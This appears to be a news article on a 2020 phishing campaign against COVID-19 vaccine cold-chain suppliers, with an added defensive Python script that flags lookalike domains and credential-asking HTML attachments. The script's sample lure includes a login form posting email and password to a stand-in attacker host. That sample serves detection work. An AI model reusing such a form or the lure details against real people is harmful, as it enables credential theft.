COVID-19 Vaccine Supply Chain Victim of Global Phishing Campaign
As the world continues to contend with the COVID-19 pandemic, and as a vaccine draws closer, a sophisticated, global phishing campaign has been targeting the credentials of organizations associated with the COVID-19 “cold chain.” These are the companies that keep vaccines viable by ensuring they are stored and transported in temperature-controlled environments.
Starting in September of 2020, the phishing campaign has spanned five countries, targeting organizations associated with Gavi, the Vaccine Alliance, a public–private global health partnership that aims to use such cold-chain companies to transport the COVID-19 vaccine safely to underdeveloped regions.
Both researchers with IBM Security X-Force and the Cybersecurity and Infrastructure Security Agency (CISA) released posts warning of the attack. They assess that the purpose of the campaign is to harvest email or network credentials in order to gain unauthorized access to the targeted organizations. While there is no concrete evidence pointing to any one group as the threat actor behind this attack, the precise targeting of key global organizations points towards potential nation-state activity.
Researchers said that attackers targeted multiple industries, governments and global partners that support a program launched by Gavi, The Vaccine Alliance in 2015. The program, called the Cold Chain Equipment Optimization Platform (CCEOP), aims to strengthen vaccine supply chains, improve worldwide immunization equity and bolster medical response to disease outbreaks. With the ongoing pandemic the program is accelerating its efforts to facilitate the distribution of the COVID-19 vaccine.
The attack consists of phishing emails purporting to come from a business executive at Haier Biomedical, sent from the spoofed lookalike domain haierbiomedical[.]com (Haier Biomedical’s legitimate domain is haiermedical.com). Haier is a Chinese company that is currently a qualified supplier for the CCEOP program, signaling that the attackers have done their homework and are sending highly targeted emails. The emails posed as requests for quotation (RFQ) related to the CCEOP program, using the subject line “RFQ – UNICEF CCEOP and Vaccine Project.”
The emails carried malicious HTML attachments which, once opened, prompted recipients to enter their credentials in order to view the file.
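The two observable traits described above, a sender domain that is a near-miss of a trusted supplier's domain and an HTML attachment that asks for a password, are both cheap to check at the mail gateway. The following is an added example, not code from the article or from IBM or CISA: it parses a constructed sample message that mimics the described lure (the lookalike domain and subject line are from the article; the recipient address, attachment name and HTML body are constructed), flags the sender domain by edit distance against an assumed allowlist of trusted supplier domains, and flags any HTML attachment containing a password input field.

```python
import email
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from html.parser import HTMLParser

# Assumed allowlist of legitimate supplier domains. haiermedical.com is the
# legitimate domain named in the article; a real deployment would load this
# from the organisation's vendor master data.
TRUSTED_SUPPLIER_DOMAINS = {"haiermedical.com"}

# Constructed HTML attachment imitating a "log in to view the document" lure.
SAMPLE_HTML = """<html><body>
<h2>Secure document - sign in to view</h2>
<form method="post" action="https://attacker.invalid/collect">
  <input type="text" name="email" placeholder="Email">
  <input type="password" name="pass" placeholder="Password">
  <input type="submit" value="View RFQ">
</form></body></html>"""


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; small enough to be useful on domain names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_domain(sender_domain: str, max_distance: int = 3):
    """Return the trusted domain the sender resembles, or None if it is
    either exactly trusted or not close to any trusted domain. The threshold
    of 3 edits catches 'haierbiomedical.com' (one inserted syllable) while
    leaving genuinely unrelated domains alone."""
    sender_domain = sender_domain.lower()
    if sender_domain in TRUSTED_SUPPLIER_DOMAINS:
        return None
    for trusted in TRUSTED_SUPPLIER_DOMAINS:
        if levenshtein(sender_domain, trusted) <= max_distance:
            return trusted
    return None


class CredentialFormDetector(HTMLParser):
    """Counts password inputs; a standalone HTML attachment has no business
    asking for one."""
    def __init__(self):
        super().__init__()
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_inputs += 1


def html_asks_for_credentials(html_text: str) -> bool:
    detector = CredentialFormDetector()
    detector.feed(html_text)
    return detector.password_inputs > 0


def triage(raw_message: str) -> dict:
    """Run both checks over one RFC 5322 message and report findings."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    _, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rpartition("@")[2]
    findings = {
        "sender_domain": sender_domain,
        "lookalike_of": lookalike_domain(sender_domain),
        "credential_html_attachments": [],
    }
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            if html_asks_for_credentials(part.get_content()):
                findings["credential_html_attachments"].append(part.get_filename())
    return findings


def build_sample_message() -> str:
    """Constructed lure modelled on the article's description."""
    msg = EmailMessage()
    msg["From"] = "Business Executive <exec@haierbiomedical.com>"
    msg["To"] = "procurement@example.org"          # constructed recipient
    msg["Subject"] = "RFQ - UNICEF CCEOP and Vaccine Project"
    msg.set_content("Please review the attached request for quotation.")
    msg.add_attachment(SAMPLE_HTML, subtype="html", filename="RFQ.html")
    return msg.as_string()


if __name__ == "__main__":
    print(triage(build_sample_message()))
```

The domain check deliberately compares against a short allowlist of suppliers the organisation actually deals with rather than a generic brand list; that keeps false positives manageable and mirrors the fact that this campaign impersonated a specific CCEOP supplier. Any message that trips either check should be quarantined and the credentials of anyone who already opened the attachment reset.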
Should the attackers manage to steal these credentials, the implications would be serious. They could use the credentials to gain insight into internal communications, as well as the background processes, methods and plans for COVID-19 vaccine distribution, including sensitive government information about the infrastructure used to distribute the vaccine. Attackers could also use the credentials to move deeper into victim environments, researchers warned, allowing them to conduct further espionage.
Sources: